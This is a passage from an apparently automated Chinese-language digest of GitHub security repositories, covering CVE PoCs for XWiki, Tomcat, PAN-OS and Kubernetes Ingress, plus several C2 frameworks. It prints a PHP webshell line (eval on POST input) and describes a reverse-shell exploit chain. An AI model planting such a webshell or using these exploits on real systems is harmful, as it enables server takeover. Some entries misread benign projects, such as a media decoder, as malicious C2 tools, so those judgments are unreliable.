|||
|
|
> README.md文档提供了使用PoC的命令行参数,如目标IP地址等。
|
|||
|
|
|
|||
|
|
> 漏洞的利用可能涉及发送特制请求,以绕过身份验证。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• Palo Alto Networks PAN-OS
|
|||
|
|
• 身份验证机制
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
仓库提供了针对CVE-2025-0108漏洞的PoC,可以用于验证和评估该漏洞。这对于安全研究、漏洞分析和渗透测试具有重要价值。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### CVE-2025-24893-PoC - XWiki RCE漏洞PoC
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [CVE-2025-24893-PoC](https://github.com/iSee857/CVE-2025-24893-PoC) |
|
|||
|
|
| 风险等级 | `CRITICAL` |
|
|||
|
|
| 安全类型 | `POC更新` |
|
|||
|
|
| 更新类型 | `SECURITY_CRITICAL` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **2**
|
|||
|
|
- 变更文件数: **2**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库提供了针对 XWiki SolrSearchMacros 远程代码执行漏洞(CVE-2025-24893)的 PoC 脚本。 该 PoC 允许用户通过向 XWiki 实例发送恶意请求来执行任意命令。仓库更新主要集中在 README.md 文件中对漏洞的说明以及使用方法的补充。 该漏洞的影响是严重的,攻击者可以完全控制受影响的服务器。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 仓库提供 CVE-2025-24893 漏洞的 PoC |
|
|||
|
|
| 2 | PoC 允许远程代码执行 |
|
|||
|
|
| 3 | 更新集中在README.md文档 |
|
|||
|
|
| 4 | 该漏洞影响严重,攻击者可完全控制服务器 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> PoC 是一个 Python 脚本,通过构造特定的 HTTP 请求来利用 XWiki 的 SolrSearchMacros 功能中的漏洞。
|
|||
|
|
|
|||
|
|
> 攻击者可以通过该漏洞在服务器上执行任意命令。使用方式: python CVE-2025-24893.py [URL] [COMMAND]
|
|||
|
|
|
|||
|
|
> 更新修改了README.md, 增加了图片,说明了复现步骤和利用方法
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• XWiki SolrSearchMacros
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该仓库包含针对一个高危漏洞的 PoC, 提供了实际的漏洞利用代码,对于安全研究和渗透测试具有重要价值。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### CVE-2025-24813-PoC - Tomcat远程代码执行漏洞PoC
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [CVE-2025-24813-PoC](https://github.com/iSee857/CVE-2025-24813-PoC) |
|
|||
|
|
| 风险等级 | `HIGH` |
|
|||
|
|
| 安全类型 | `POC更新/漏洞利用` |
|
|||
|
|
| 更新类型 | `SECURITY_IMPROVEMENT` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **2**
|
|||
|
|
- 变更文件数: **2**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库提供了一个针对Apache Tomcat 远程代码执行漏洞(CVE-2025-24813)的批量检测脚本。本次更新主要是在README.md文件中添加了额外的PoC链接,指向了纷传社区和漏洞复现文章。这有助于用户更好地了解该漏洞的利用方法。漏洞利用的条件较为苛刻,该脚本仅针对存在漏洞的环境进行概念性验证。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 提供CVE-2025-24813的PoC |
|
|||
|
|
| 2 | 批量检测Apache Tomcat远程代码执行漏洞 |
|
|||
|
|
| 3 | 更新了README.md文件,增加了PoC链接 |
|
|||
|
|
| 4 | PoC仅用于验证漏洞,使用条件苛刻 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> PoC脚本可能包含用于探测Tomcat服务器是否易受CVE-2025-24813漏洞影响的代码。
|
|||
|
|
|
|||
|
|
> README.md 文件中的更新包括指向额外漏洞复现资源以及纷传社区。
|
|||
|
|
|
|||
|
|
> 该脚本的利用条件比较苛刻,仅针对存在漏洞的环境进行概念验证。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• Apache Tomcat
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该仓库提供了针对Apache Tomcat远程代码执行漏洞的PoC,有助于安全研究人员和渗透测试人员进行漏洞验证和评估,更新内容增加了额外的漏洞复现和PoC资源。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### Test_script - 在线安全测试工具集合
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [Test_script](https://github.com/14u9h/Test_script) |
|
|||
|
|
| 风险等级 | `HIGH` |
|
|||
|
|
| 安全类型 | `安全工具/漏洞利用` |
|
|||
|
|
| 更新类型 | `漏洞引入` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **1**
|
|||
|
|
- 变更文件数: **1**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库是一个个人维护的安全测试脚本集合,包含在线工具、App漏洞利用POC、Client端漏洞POC,以及用于远程加载的测试脚本。最近更新包含了对phpinfo.php文件的修改,添加了eval函数,存在远程代码执行的风险。仓库主要功能是为安全测试提供辅助工具和漏洞利用演示,与安全工具关键词高度相关。本次更新增加了远程代码执行的风险。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 包含多个在线安全工具 |
|
|||
|
|
| 2 | 提供了WebView远程命令执行漏洞POC |
|
|||
|
|
| 3 | 包含CVE-2018-8174_PoC |
|
|||
|
|
| 4 | 更新的phpinfo.php文件存在远程代码执行漏洞 |
|
|||
|
|
| 5 | 与安全工具关键词高度相关 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> phpinfo.php文件中添加了 eval($_POST['a']),允许通过POST请求执行任意代码
|
|||
|
|
|
|||
|
|
> 在线工具包括HackTools, meTools, 杀软查询工具,Windows提权查询工具
|
|||
|
|
|
|||
|
|
> App漏洞演示了WebView远程命令执行漏洞
|
|||
|
|
|
|||
|
|
> Client漏洞演示了CVE-2018-8174漏洞
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• PHP
|
|||
|
|
• WebView
|
|||
|
|
• Internet Explorer
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该仓库提供了安全测试相关的工具和漏洞POC,特别是在phpinfo.php文件中新增的eval函数,可以直接实现远程代码执行,表明该仓库的核心功能与安全测试高度相关。虽然代码质量不高,但其功能满足了安全研究的需求。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### c22w - C2框架,Webshell客户端
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [c22w](https://github.com/flank9/c22w) |
|
|||
|
|
| 风险等级 | `MEDIUM` |
|
|||
|
|
| 安全类型 | `安全研究` |
|
|||
|
|
| 更新类型 | `GENERAL_UPDATE` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **5**
|
|||
|
|
- 变更文件数: **1**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库是一个C2框架,本次更新新增了index.js文件,可能包含了客户端的逻辑。由于缺乏更多信息,无法确定其具体功能和潜在的安全风险。仓库的整体功能是构建一个C2框架,其核心在于远程控制和命令执行,此类工具潜在的安全风险较高。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 新增index.js文件,可能实现C2客户端逻辑 |
|
|||
|
|
| 2 | 基于C2框架,具有潜在的安全风险 |
|
|||
|
|
| 3 | 缺乏详细信息,难以进行深入分析 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> index.js文件包含了一些混淆代码,增加了代码分析的难度
|
|||
|
|
|
|||
|
|
> C2框架通常涉及命令执行和数据传输,容易成为攻击目标
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• index.js
|
|||
|
|
• C2框架客户端
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
尽管更新内容较为初步,但C2框架本身具有较高的安全研究价值。即使是简单的C2框架,也可能存在未知的安全漏洞和利用方式,值得关注。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### HPVP-C2C-Application - C2C应用,新增JWT认证和产品管理
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [HPVP-C2C-Application](https://github.com/KalamataPrasanth/HPVP-C2C-Application) |
|
|||
|
|
| 风险等级 | `MEDIUM` |
|
|||
|
|
| 安全类型 | `安全功能` |
|
|||
|
|
| 更新类型 | `SECURITY_IMPROVEMENT` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **5**
|
|||
|
|
- 变更文件数: **26**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库是一个C2C(customer-to-customer)应用程序,使用React和Node.js构建。主要功能包括用户认证、产品管理和数据库集成。此次更新主要集中在后端,增加了用户登录认证(JWT),产品创建、查询、更新和删除的API接口,以及心愿单功能。更新还包括环境设置、依赖安装和后端目录结构的优化。由于涉及到用户认证和敏感数据(产品信息)的管理,因此存在安全风险。此次更新完善了认证流程和产品管理的功能,增强了应用程序的整体安全性,但同时也增加了潜在的攻击面。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 实现了基于JWT的用户登录认证。 |
|
|||
|
|
| 2 | 新增了产品管理相关的API接口(增删改查)。 |
|
|||
|
|
| 3 | 增加了心愿单功能。 |
|
|||
|
|
| 4 | 后端目录结构优化。 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 使用bcryptjs进行密码加密存储。
|
|||
|
|
|
|||
|
|
> 通过JWT进行用户身份验证和授权。
|
|||
|
|
|
|||
|
|
> 使用express构建RESTful API。
|
|||
|
|
|
|||
|
|
> 使用mongoose进行MongoDB数据库操作。
|
|||
|
|
|
|||
|
|
> 使用multer处理文件上传。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• 后端API(auth.route.js, product.route.js, wishlist.route.js)。
|
|||
|
|
• 用户认证模块
|
|||
|
|
• 产品管理模块
|
|||
|
|
• 数据库模块
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该更新涉及用户身份认证和敏感数据(产品信息)管理,完善了应用程序的功能和安全性,但同时也增加了潜在的攻击面,如JWT的泄露和XSS攻击。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### MediaSDK_C2 - MediaSDK C2框架更新
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [MediaSDK_C2](https://github.com/projectceladon/MediaSDK_C2) |
|
|||
|
|
| 风险等级 | `MEDIUM` |
|
|||
|
|
| 安全类型 | `安全修复` |
|
|||
|
|
| 更新类型 | `SECURITY_IMPROVEMENT` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **2**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库名为MediaSDK_C2,从名称和关键词'C2'可以推断这是一个C2框架相关的项目。本次更新主要修复了与解码器初始化和分辨率改变相关的稳定性问题。更新包括了移除InCache逻辑,该逻辑可能导致缓冲池耗尽,从而引发卡顿问题。同时,更新还回滚了之前解决分辨率改变时卡顿问题的修复方案。由于C2框架通常涉及恶意代码控制和隐蔽通信,这些更新虽然没有直接的安全漏洞修复或功能增强,但是间接提升了C2框架的稳定性,避免潜在的拒绝服务或功能失效问题,这对于C2框架的正常运行至关重要。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | C2框架,可能用于恶意活动。 |
|
|||
|
|
| 2 | 修复了解码器初始化和分辨率改变相关的稳定性问题。 |
|
|||
|
|
| 3 | 移除了可能导致缓冲池耗尽的InCache逻辑。 |
|
|||
|
|
| 4 | 回滚了之前解决分辨率改变时卡顿问题的修复方案。 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 移除InCache逻辑,该逻辑在初始化解码器时会消耗缓冲池中的所有缓冲,导致潜在的卡顿问题。
|
|||
|
|
|
|||
|
|
> 回滚了之前的修复方案,修复了分辨率改变时可能出现的卡顿问题。
|
|||
|
|
|
|||
|
|
> 更新主要集中在解码器的初始化和资源管理上,以提高稳定性。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• 解码器
|
|||
|
|
• 缓冲池
|
|||
|
|
• MediaSDK_C2框架
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
虽然本次更新没有直接修复安全漏洞,但涉及C2框架的稳定性改进,这对于恶意活动至关重要。稳定性问题可能导致C2框架功能失效或被检测到,因此修复有助于提高其隐蔽性和持久性。由于C2框架的特殊性质,任何提高其稳定性的措施都具有一定的价值。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### CyberForgeNinja - AI驱动的网络身份与安全工具
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [CyberForgeNinja](https://github.com/ROCyberSolutions/CyberForgeNinja) |
|
|||
|
|
| 风险等级 | `LOW` |
|
|||
|
|
| 安全类型 | `安全工具` |
|
|||
|
|
| 更新类型 | `功能更新` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **3**
|
|||
|
|
- 变更文件数: **3**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库CyberForge Ninja是一个网络安全工具包,主要功能包括:黑客身份生成(包含AI生成背景)、密码生成(含AI建议和暗网模式)、AI集成(DeepSeek API,用于名称分析、背景生成和密码建议)、主题UI和实用程序(历史记录、导出、复制)。
|
|||
|
|
|
|||
|
|
本次更新(v12.0)增加了对DeepSeek API的完整AI集成、密码强度计、暗网加密模式,以及AI设置标签页,UI增强,并修复了交互问题。该工具主要通过Python的tkinter库实现GUI界面,并依赖requests、zxcvbn等第三方库。没有发现明显的漏洞。
|
|||
|
|
|
|||
|
|
总结:该项目是一个综合性的安全工具,集成了AI功能,对渗透测试和安全研究有一定的价值。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 提供AI驱动的黑客身份生成和密码生成功能。 |
|
|||
|
|
| 2 | 集成了DeepSeek API,增强了AI功能。 |
|
|||
|
|
| 3 | 包含密码强度评估和暗网模式。 |
|
|||
|
|
| 4 | 提供友好的GUI界面和实用工具。 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 使用Python和tkinter构建GUI。
|
|||
|
|
|
|||
|
|
> 集成了DeepSeek API进行AI功能。
|
|||
|
|
|
|||
|
|
> 使用zxcvbn进行密码强度评估。
|
|||
|
|
|
|||
|
|
> 利用pycryptodome进行加密(暗网模式)
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• tkinter
|
|||
|
|
• requests
|
|||
|
|
• zxcvbn
|
|||
|
|
• pycryptodome
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该项目与安全研究和渗透测试相关,提供了独特的AI驱动的功能,如身份生成、密码生成和AI建议。虽然不包含明显的漏洞利用,但其功能在安全评估和测试中具有一定的实用价值,特别是其AI集成功能。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### ai-generated-articles - MongoDB备份与恢复指南
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [ai-generated-articles](https://github.com/marcuwynu23/ai-generated-articles) |
|
|||
|
|
| 风险等级 | `LOW` |
|
|||
|
|
| 安全类型 | `安全功能` |
|
|||
|
|
| 更新类型 | `SECURITY_IMPROVEMENT` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **1**
|
|||
|
|
- 变更文件数: **1**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库主要提供关于编程设置、安装和优化工作流程的指南和教程。本次更新新增了关于使用 `mongodump`、`zstd` 和 SquashFS 备份 MongoDB 数据库的文章。该文章详细介绍了如何使用 `mongodump` 工具备份 MongoDB 数据库,并结合 `zstd` 进行压缩以加快备份速度,以及使用 SquashFS 创建快照以确保数据完整性。虽然该更新本身不涉及安全漏洞,但 MongoDB 备份是数据库安全的重要组成部分,备份策略的有效性直接关系到数据安全和灾难恢复能力。不正确或不安全的备份方法可能导致数据泄露或备份恢复失败。文章提供了一种较为全面的备份方法,对于维护数据库安全有一定价值。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 介绍了使用 mongodump 备份 MongoDB 数据库的方法。 |
|
|||
|
|
| 2 | 结合 zstd 压缩,提高备份效率。 |
|
|||
|
|
| 3 | 使用 SquashFS 创建快照,增强数据完整性。 |
|
|||
|
|
| 4 | 提供了一种相对全面的 MongoDB 备份策略。 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 使用 mongodump 命令行工具进行数据库备份。
|
|||
|
|
|
|||
|
|
> 使用 zstd 进行压缩以减小备份文件大小并提高备份速度。
|
|||
|
|
|
|||
|
|
> 使用 SquashFS 创建快照,用于创建只读的、压缩的备份文件系统,以防止数据在备份过程中被修改。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• MongoDB数据库
|
|||
|
|
• mongodump工具
|
|||
|
|
• zstd压缩工具
|
|||
|
|
• SquashFS文件系统
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该更新虽然没有直接涉及安全漏洞,但提供了 MongoDB 数据库的备份策略,有助于提高数据安全性和灾难恢复能力。有效的备份策略是数据库安全的重要组成部分。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### ChatGPT-Prompts-for-SOC-Analyst - AI辅助SOC分析,网络分析
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [ChatGPT-Prompts-for-SOC-Analyst](https://github.com/Pavel-Hrabec/ChatGPT-Prompts-for-SOC-Analyst) |
|
|||
|
|
| 风险等级 | `MEDIUM` |
|
|||
|
|
| 安全类型 | `安全功能` |
|
|||
|
|
| 更新类型 | `SECURITY_IMPROVEMENT` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **2**
|
|||
|
|
- 变更文件数: **2**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库包含一系列用于SOC分析师的ChatGPT提示词,旨在帮助自动化日常任务。本次更新新增了针对网络数据包分析的提示词。更新内容包含:1. 网络数据包分析提示词,用于分析注册表更改;2. 评估注册表更改的潜在影响。通过AI辅助进行网络分析,可以辅助安全分析人员进行威胁检测和响应。但是,该项目依赖于ChatGPT模型,其分析结果的准确性和有效性取决于提示词的设计和ChatGPT的性能。如果提示词设计不合理,可能导致误报或漏报。本次更新提供的提示词涉及注册表更改分析,可能用于识别恶意行为或配置更改。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 提供ChatGPT提示词,辅助SOC分析师工作 |
|
|||
|
|
| 2 | 新增网络数据包分析提示词 |
|
|||
|
|
| 3 | 提示词涉及注册表更改分析 |
|
|||
|
|
| 4 | 利用AI分析网络流量和注册表变更 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 提供注册表更改的分析提示词
|
|||
|
|
|
|||
|
|
> 提示词设计用于评估注册表更改的潜在影响和与MITRE ATT&CK框架的关联
|
|||
|
|
|
|||
|
|
> 基于ChatGPT的自然语言处理能力,用于分析网络数据包和注册表变更
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• ChatGPT
|
|||
|
|
• SOC analyst
|
|||
|
|
• Network traffic
|
|||
|
|
• Registry changes
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该仓库提供了AI辅助安全分析的实用方法。更新增加了网络分析相关的提示词,这有助于安全分析师自动化分析流程和提高效率。虽然该项目本身不直接包含漏洞或利用代码,但其提供的提示词能够辅助安全分析师进行威胁检测和响应,提升安全防护能力。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### CVE-2025-1974 - Ingress RCE via Path Traversal
|
|||
|
|
|
|||
|
|
#### 📌 漏洞信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| CVE编号 | CVE-2025-1974 |
|
|||
|
|
| 风险等级 | `CRITICAL` |
|
|||
|
|
| 利用状态 | `漏洞利用可用` |
|
|||
|
|
| 发布时间 | 2025-04-01 00:00:00 |
|
|||
|
|
| 最后更新 | 2025-04-01 11:10:26 |
|
|||
|
|
|
|||
|
|
#### 📦 相关仓库
|
|||
|
|
|
|||
|
|
- [CVE-2025-1974](https://github.com/zwxxb/CVE-2025-1974)
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
The repository provides an exploit for CVE-2025-1974, a critical vulnerability in the Kubernetes Ingress Nginx Controller. The exploit allows for Remote Code Execution (RCE) through a path traversal vulnerability. The repository includes a working exploit. The exploit comprises of shellcode creation, uploading, and brute-force the file descriptor to achieve code execution. The latest commit includes a setup script and updated exploit code, as well as a lab setup guide to facilitate testing of the vulnerability. The exploit targets specific annotations to inject and execute shared objects as SSL engines. The exploit can cause a reverse shell into a Kubernetes cluster by submitting a malicious Ingress configuration.
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | RCE vulnerability in Ingress Nginx Controller. |
|
|||
|
|
| 2 | Exploit uses path traversal to load arbitrary shared objects. |
|
|||
|
|
| 3 | Exploit code is provided and functional. |
|
|||
|
|
| 4 | Includes setup script and lab guide for testing. |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> The vulnerability is in how the Ingress Controller handles specific annotations, allowing for the loading of arbitrary shared objects.
|
|||
|
|
|
|||
|
|
> The exploit creates a malicious shared object (.so) containing a reverse shell payload.
|
|||
|
|
|
|||
|
|
> The exploit uploads the shellcode and brute-forces file descriptors to trigger execution via annotations.
|
|||
|
|
|
|||
|
|
> The exploit uses a specially crafted annotation (e.g., nginx.ingress.kubernetes.io/auth-tls-match-cn) to reference the uploaded shared object and trigger code execution.
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• Kubernetes Ingress Nginx Controller
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
The exploit provides a working implementation for a critical RCE vulnerability. The exploit is provided, and the repository includes instructions for setup and execution, facilitating easy verification of the vulnerability.
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### Riot-C2 - Riot-C2: 渗透测试C2框架
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [Riot-C2](https://github.com/JancoNel/Riot-C2) |
|
|||
|
|
| 风险等级 | `HIGH` |
|
|||
|
|
| 安全类型 | `漏洞利用` |
|
|||
|
|
| 更新类型 | `SECURITY_IMPROVEMENT` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **2**
|
|||
|
|
- 变更文件数: **6**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库是一个C2框架,此次更新添加了client端编译脚本,requirements文件,以及server端和client端的功能增强和修改。 整体来看,该项目是一个用于渗透测试的C2框架,通过client-server模式进行恶意控制。 更新内容涉及client端的代码逻辑修改,server端新增功能,以及编译和启动脚本的添加。 client.py 文件在功能上进行了较大改动,可能涉及了新的命令和控制逻辑。 compile.py 脚本使用pyinstaller将client.py编译成独立的可执行文件。 start.py用于安装依赖并启动服务端。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | C2框架增加了编译脚本,方便部署 |
|
|||
|
|
| 2 | client端代码逻辑修改,功能增强 |
|
|||
|
|
| 3 | server端功能增强 |
|
|||
|
|
| 4 | 提供了编译后的客户端,方便使用 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
